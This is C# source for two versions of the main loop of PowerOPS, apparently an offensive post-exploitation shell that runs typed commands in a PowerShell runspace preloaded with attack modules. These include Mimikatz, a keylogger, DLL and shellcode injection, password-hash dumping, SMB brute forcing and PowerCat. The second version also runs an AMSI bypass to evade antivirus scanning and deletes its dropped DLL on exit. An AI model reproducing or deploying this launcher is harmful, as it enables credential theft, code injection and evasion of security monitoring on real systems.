public static void Main() {
    // Entry point. Runs an interactive "PS > " loop: each typed command is executed in a
    // local PowerShell runspace after every embedded module script has been added to the
    // same pipeline. Helpers used here (DisplayBanner, DisplayModules, IsUserAdministrator,
    // isArch_x86, the PowerOPS.* script getters) are defined elsewhere in the file.
    Console.Title = "PowerOPS - [email protected]";
    Console.SetWindowSize(Math.Min(122, Console.LargestWindowWidth), Math.Min(40, Console.LargestWindowHeight));
    Console.SetBufferSize(Console.BufferWidth, Console.BufferHeight);
    string command = null;
    DisplayBanner();
    Console.WriteLine("Type 'show' to list available modules\n");
    // One runspace for the whole session; it is only closed after the loop (see note at "exit").
    Runspace runspace = RunspaceFactory.CreateRunspace();
    runspace.Open();
    do {
        Console.Write("PS > ");
        command = Console.ReadLine();
        // NOTE(review): ReadLine returns null at end of input; a null command falls through
        // to the default case and reaches command.IndexOf below, outside the try block.
        switch (command) {
            case "show":
                DisplayModules();
                break;
            case "exit":
                // Returns straight out of Main, so the runspace.Close() / Environment.Exit(0)
                // after the loop are not reached on this path; the loop condition below is
                // therefore only ever evaluated for non-"exit" input.
                return;
            default:
                // Prefix checks (IndexOf == 0, case-insensitive): commands that begin with
                // the two credential-module names are gated on IsUserAdministrator(), and
                // Invoke-Shellcode on isArch_x86(). "break" here leaves the switch only;
                // the prompt loop continues.
                if (command.IndexOf("Invoke-Mimikatz", StringComparison.OrdinalIgnoreCase) == 0) {
                    if (!IsUserAdministrator()) { break; }
                }
                if (command.IndexOf("Get-PassHashes", StringComparison.OrdinalIgnoreCase) == 0) {
                    if (!IsUserAdministrator()) { break; }
                }
                if (command.IndexOf("Invoke-Shellcode", StringComparison.OrdinalIgnoreCase) == 0) {
                    if (!isArch_x86()) { break; }
                }
                try {
                    // A fresh pipeline per command. Every embedded module script is re-added
                    // ahead of the user's command on each iteration, so the full module set is
                    // re-evaluated by the runspace every time.
                    // NOTE(review): if PowerShell script block logging is enabled on the host,
                    // each iteration would presumably log all of these scripts — verify.
                    Pipeline pipeline = runspace.CreatePipeline();
                    pipeline.Commands.AddScript(PowerOPS.GetKeyStrokes());
                    pipeline.Commands.AddScript(PowerOPS.InvokeDLLInjection());
                    pipeline.Commands.AddScript(PowerOPS.InvokeMimikatz());
                    pipeline.Commands.AddScript(PowerOPS.InvokeNinjaCopy());
                    pipeline.Commands.AddScript(PowerOPS.InvokeReflectivePEInjection());
                    pipeline.Commands.AddScript(PowerOPS.InvokeShellcode());
                    pipeline.Commands.AddScript(PowerOPS.InvokeTokenManipulation());
                    pipeline.Commands.AddScript(PowerOPS.InvokeWMICommand());
                    pipeline.Commands.AddScript(PowerOPS.PowerUp());
                    pipeline.Commands.AddScript(PowerOPS.PowerView());
                    pipeline.Commands.AddScript(PowerOPS.Nishang_GetInformation());
                    pipeline.Commands.AddScript(PowerOPS.Nishang_GetPassHashes());
                    pipeline.Commands.AddScript(PowerOPS.Nishang_PortScan());
                    pipeline.Commands.AddScript(PowerOPS.AutoGPPPassword());
                    pipeline.Commands.AddScript(PowerOPS.PowerCat());
                    pipeline.Commands.AddScript(PowerOPS.GetProductKey());
                    pipeline.Commands.AddScript(PowerOPS.Empire_InvokePSExec());
                    pipeline.Commands.AddScript(PowerOPS.Empire_InvokeSshCommand());
                    // The user's command runs last, with output flattened to text by Out-String.
                    pipeline.Commands.AddScript(command);
                    pipeline.Commands.Add("Out-String");
                    Collection <PSObject> results = pipeline.Invoke();
                    StringBuilder stringBuilder = new StringBuilder();
                    foreach (PSObject obj in results) {
                        stringBuilder.AppendLine(obj.ToString());
                    }
                    Console.Write(stringBuilder.ToString());
                } catch (Exception e) {
                    // Any failure in the pipeline (parse error, module throw) is reduced to
                    // its message; the session continues.
                    Console.WriteLine("{0}", e.Message);
                }
                break;
        }
    } while (command != "exit");
    runspace.Close();
    Environment.Exit(0);
}
public static void Main() {
    // Entry point. Same interactive "PS > " loop as the earlier variant, with two
    // additions: an AMSI bypass call at startup and an explicit cleanup on "exit".
    // Helpers used here (DisplayBanner, DisplayModules, IsUserAdministrator, isArch_x86,
    // amsibypass.Amsi, the PowerOPS.* script getters) are defined elsewhere in the file.
    Console.Title = "PowerOPS - [email protected]";
    Console.SetWindowSize(Math.Min(122, Console.LargestWindowWidth), Math.Min(40, Console.LargestWindowHeight));
    Console.SetBufferSize(Console.BufferWidth, Console.BufferHeight);
    // Amsi bypass technique from: http://cn33liz.blogspot.co.uk/2016/05/bypassing-amsi-using-powershell-5-dll.html
    // The bypass is selected by the process architecture environment variable.
    // NOTE(review): given the "exit" cleanup below, amsibypass.Amsi presumably writes an
    // Amsi.dll into the current directory — confirm against its definition. That file is
    // an on-disk artifact for the lifetime of the session.
    string Arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
    amsibypass.Amsi(Arch);
    string command = null;
    DisplayBanner();
    Console.WriteLine("Type 'show' to list available modules\n");
    // One runspace for the whole session; closed only in the "exit" case.
    Runspace runspace = RunspaceFactory.CreateRunspace();
    runspace.Open();
    do {
        Console.Write("PS > ");
        command = Console.ReadLine();
        // NOTE(review): ReadLine returns null at end of input; a null command falls through
        // to the default case and reaches command.IndexOf below, outside the try block.
        switch (command) {
            case "show":
                DisplayModules();
                break;
            case "exit":
                // Removes the Amsi.dll from the current working directory if present, closes
                // the runspace and terminates the process. The "return" after Environment.Exit
                // is unreachable; the loop condition below is never evaluated for "exit".
                string path = Directory.GetCurrentDirectory();
                if (File.Exists(path + "\\Amsi.dll")) {
                    File.Delete(path + "\\Amsi.dll");
                }
                runspace.Close();
                Environment.Exit(0);
                return;
            default:
                // Prefix checks (IndexOf == 0, case-insensitive): commands that begin with
                // the two credential-module names are gated on IsUserAdministrator(), and
                // Invoke-Shellcode on isArch_x86(). "break" here leaves the switch only;
                // the prompt loop continues.
                if (command.IndexOf("Invoke-Mimikatz", StringComparison.OrdinalIgnoreCase) == 0) {
                    if (!IsUserAdministrator()) { break; }
                }
                if (command.IndexOf("Get-PassHashes", StringComparison.OrdinalIgnoreCase) == 0) {
                    if (!IsUserAdministrator()) { break; }
                }
                if (command.IndexOf("Invoke-Shellcode", StringComparison.OrdinalIgnoreCase) == 0) {
                    if (!isArch_x86()) { break; }
                }
                try {
                    // A fresh pipeline per command. Every embedded module script is re-added
                    // ahead of the user's command on each iteration, so the full module set is
                    // re-evaluated by the runspace every time.
                    // NOTE(review): if PowerShell script block logging is enabled on the host,
                    // each iteration would presumably log all of these scripts — verify.
                    Pipeline pipeline = runspace.CreatePipeline();
                    pipeline.Commands.AddScript(PowerOPS.GetKeyStrokes());
                    pipeline.Commands.AddScript(PowerOPS.InvokeDLLInjection());
                    pipeline.Commands.AddScript(PowerOPS.InvokeMimikatz());
                    pipeline.Commands.AddScript(PowerOPS.InvokeNinjaCopy());
                    pipeline.Commands.AddScript(PowerOPS.InvokeReflectivePEInjection());
                    pipeline.Commands.AddScript(PowerOPS.InvokeShellcode());
                    pipeline.Commands.AddScript(PowerOPS.InvokeTokenManipulation());
                    pipeline.Commands.AddScript(PowerOPS.InvokeWMICommand());
                    pipeline.Commands.AddScript(PowerOPS.PowerUp());
                    pipeline.Commands.AddScript(PowerOPS.PowerView());
                    pipeline.Commands.AddScript(PowerOPS.Nishang_GetInformation());
                    pipeline.Commands.AddScript(PowerOPS.Nishang_GetPassHashes());
                    pipeline.Commands.AddScript(PowerOPS.Nishang_PortScan());
                    pipeline.Commands.AddScript(PowerOPS.AutoGPPPassword());
                    pipeline.Commands.AddScript(PowerOPS.PowerCat());
                    pipeline.Commands.AddScript(PowerOPS.Empire_InvokePSExec());
                    pipeline.Commands.AddScript(PowerOPS.Empire_InvokeSshCommand());
                    pipeline.Commands.AddScript(PowerOPS.InvokeMimikittenz());
                    pipeline.Commands.AddScript(PowerOPS.PowerUpSQL());
                    pipeline.Commands.AddScript(PowerOPS.InvokeSMBAutoBrute());
                    // The user's command runs last, with output flattened to text by Out-String.
                    pipeline.Commands.AddScript(command);
                    pipeline.Commands.Add("Out-String");
                    Collection <PSObject> results = pipeline.Invoke();
                    StringBuilder stringBuilder = new StringBuilder();
                    foreach (PSObject obj in results) {
                        stringBuilder.AppendLine(obj.ToString());
                    }
                    Console.Write(stringBuilder.ToString());
                } catch (Exception e) {
                    // Any failure in the pipeline (parse error, module throw) is reduced to
                    // its message; the session continues.
                    Console.WriteLine("{0}", e.Message);
                }
                break;
        }
    } while (command != "exit");
}